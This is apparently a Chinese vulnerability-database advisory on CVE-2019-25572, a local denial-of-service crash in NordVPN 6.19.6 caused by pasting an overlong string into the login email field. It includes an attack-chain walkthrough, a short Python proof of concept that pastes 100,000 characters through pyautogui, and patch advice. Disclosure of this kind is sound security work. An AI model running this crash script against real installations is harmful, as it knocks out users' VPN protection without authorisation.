CVE-2019-25572 CVSS 6.2 中危

CVE-2019-25572 NordVPN本地拒绝服务漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25572

漏洞类型

缓冲区溢出

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NordVPN

漏洞概述

NordVPN 6.19.6版本存在一个严重的拒绝服务漏洞。由于应用程序对输入数据的边界检查不足，本地攻击者无需任何权限即可在登录界面的邮箱输入框中粘贴包含10万个字符的字符串。此操作会触发缓冲区溢出，从而导致NordVPN应用程序崩溃，造成服务中断。

技术细节

该漏洞的根本原因在于NordVPN客户端6.19.6版本在处理用户输入数据时，未对邮箱输入字段进行严格的长度限制和边界检查。当攻击者在登录界面的邮箱输入框中粘贴一个包含约10万个字符的精心构造的字符串时，程序底层逻辑无法正确处理该过大的数据缓冲区，从而触发缓冲区溢出错误。由于CVSS向量显示攻击路径为本地（AV:L）且无需用户交互（UI:N），攻击者只需能够访问本地计算机的控制台即可利用此漏洞。尽管该漏洞主要导致应用程序崩溃（高可用性影响），从而强制断开VPN连接，但根据CVSS评分，其对机密性和完整性的影响较小或无影响。这种漏洞可以被用于干扰目标主机的网络代理服务。

攻击链分析

STEP 1

步骤1：本地访问

攻击者获得目标计算机的本地访问权限，能够操作图形界面。

STEP 2

步骤2：启动应用

打开NordVPN客户端应用程序，进入登录界面。

STEP 3

步骤3：执行攻击

将鼠标焦点置于邮箱输入框，粘贴包含10万个字符的恶意字符串。

STEP 4

步骤4：触发崩溃

应用程序因无法处理过量数据触发缓冲区溢出，导致服务停止（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import pyautogui
import pyperclip
import time

# Generate the payload: a buffer of 100,000 characters
# This mimics the exploit described in the vulnerability report
payload = "A" * 100000

def exploit_nordvpn_dos():
    print("[+] Copying payload to clipboard...")
    pyperclip.copy(payload)
    
    print("[!] WARNING: This will crash the NordVPN application.")
    print("[+] Please switch to the NordVPN login window within 5 seconds...")
    time.sleep(5)
    
    # Simulate the user interaction to paste the payload into the email field
    # Assuming the cursor is focused on the email input field
    print("[+] Pasting payload into the email field...")
    pyautogui.hotkey('ctrl', 'v')
    
    print("[+] Payload delivered. Application should crash shortly.")

if __name__ == "__main__":
    exploit_nordvpn_dos()

影响范围

NordVPN 6.19.6

防御指南

临时缓解措施

建议立即将NordVPN更新到修复了此问题的最新版本。在应用补丁之前，应确保计算机安全，防止未授权人员通过本地终端输入超长字符串导致服务中断。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表